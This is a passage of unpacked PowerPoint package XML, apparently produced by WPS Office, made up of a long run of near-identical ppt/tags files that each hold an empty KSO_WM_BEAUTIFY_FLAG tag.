  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag201.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag202.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag203.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag204.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag205.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag206.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag207.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag208.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag209.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag21.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag210.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag211.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag212.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag213.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag214.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag215.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag216.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag217.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag218.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag219.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag22.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag220.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag221.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag222.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag223.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag224.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag225.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag226.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag227.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag228.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag229.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag23.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag230.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag231.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag232.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag233.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag234.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag235.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag236.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag237.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag238.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag239.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag24.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag240.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag241.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag242.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag243.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag244.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag245.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag246.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag247.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag248.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag249.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag25.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag250.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag251.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag252.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag253.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag254.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag255.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag256.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag257.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag258.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag259.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag26.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag260.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag261.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag262.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag263.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag264.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag265.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag266.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag267.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag268.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag269.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag27.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag270.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag271.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag272.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag273.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag274.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag275.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag276.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag277.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag278.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag279.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag28.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag280.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag281.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag282.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag283.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag284.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag285.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag286.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag287.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag288.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag289.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag29.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag290.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag291.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag292.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag293.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag294.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag295.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag296.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag297.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag298.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag299.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3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00.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag301.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag302.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag303.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag304.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag305.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag306.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag307.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag308.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09.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xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
